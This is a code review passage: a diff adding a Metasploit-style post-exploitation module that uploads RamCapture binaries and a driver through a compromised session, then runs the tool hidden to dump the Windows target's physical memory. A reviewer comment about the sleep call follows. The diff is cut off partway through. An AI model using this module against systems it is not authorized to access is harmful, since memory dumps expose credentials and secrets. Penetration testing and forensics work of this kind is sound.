modules/post/windows/gather/forensics/memorydump.rb

```diff
@@ -0,0 +1,230 @@
+  end
+
+  def get_env_vars
+    @win_env_vars = {}
+    
+    env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive', 'PROCESSOR_ARCHITECTURE', 'PROCESSOR_ARCHITEW6432')
+
+    @win_env_vars['temp'] = env_vars['TEMP'] + "\\"
+    @win_env_vars['system_drive'] = env_vars['SystemDrive']
+    @win_env_vars['arch'] = 'x86'
+
+    if env_vars['PROCESSOR_ARCHITECTURE'].nil? or env_vars['PROCESSOR_ARCHITECTURE'].empty?
+        print_error("Was not possible to determine Windows Architherure (x86 oe x64)")
+        return
+    end
+
+    if env_vars['PROCESSOR_ARCHITECTURE'] =~ /amd64/i
+        @win_env_vars['arch'] = 'x64'
+    end
+
+    if env_vars['PROCESSOR_ARCHITEW6432'] =~ /amd64/i
+        @win_env_vars['arch'] = 'x64'
+    end
+
+    true
+  end
+
+  def send_and_execute
+    
+
+    new_file = Rex::Text::rand_text_alpha(5 + rand(3)) + ".vmem"
+    tmp = Dir::tmpdir + "/" + new_file
+    mem_dump = @win_env_vars['temp'] + new_file
+
+    cmd = ""
+    prog2check = ""
+
+    print_warning("Sending file, this may take some time...")
+    files = Array[]
+
+    if @win_env_vars['arch'] == "x64"
+
+        files.push('msvcp110.dll')
+        files.push('msvcr110.dll')
+        files.push('RamCapture64.exe')
+        files.push('ramcapturedriver.cat')
+        files.push('RamCaptureDriver64.sys')
+
+        prog2check = 'RamCapture64.exe'
+        mem_dump = @win_env_vars['temp'] + new_file
+
+        ramcapture_path = datastore['RAMCAPTURE_PATH']
+
+        files.each do |f|
+            file = File.join(ramcapture_path, 'x64/' + f)
+
+            if !File.exist?(file) or !File.file?(file)
+                print_error("File not found: #{file}")
+                return
+            end
+
+        end
+
+
+        files.each do |f|
+            file = File.join(ramcapture_path, 'x64/' + f)
+
+            print_status("Uploading file #{@win_env_vars['temp']}#{f}")
+            session.fs.file.upload_file(@win_env_vars['temp'] + f, file)  
+
+        end
+
+
+    else
+
+
+        files.push('msvcp110.dll')
+        files.push('msvcr110.dll')
+        files.push('RamCapture.exe')
+        files.push('RamCaptureDriver.sys')
+
+        prog2check = 'RamCapture.exe'
+
+        ramcapture_path = datastore['RAMCAPTURE_PATH']
+
+        files.each do |f|
+            file = File.join(ramcapture_path, 'x86/' + f)
+
+            if !File.exist?(file) or !File.file?(file)
+                print_error("File not found: #{file}")
+                return
+            end
+
+        end
+
+
+        files.each do |f|
+            file = File.join(ramcapture_path, 'x86/' + f)
+
+            print_status("Uploading file #{@win_env_vars['temp']}#{f}")
+            session.fs.file.upload_file(@win_env_vars['temp'] + f, file)  
+
+        end
+
+
+    end
+
+    print_status("Running #{prog2check}")
+    print_warning("This may take some time...")
+    r = session.sys.process.execute( @win_env_vars['temp'] + prog2check, mem_dump,{'Hidden' => true})
+    sleep(2)
```

Comment:
What's the sleep for? And please use `Rex.sleep` instead of the builtin Ruby sleep.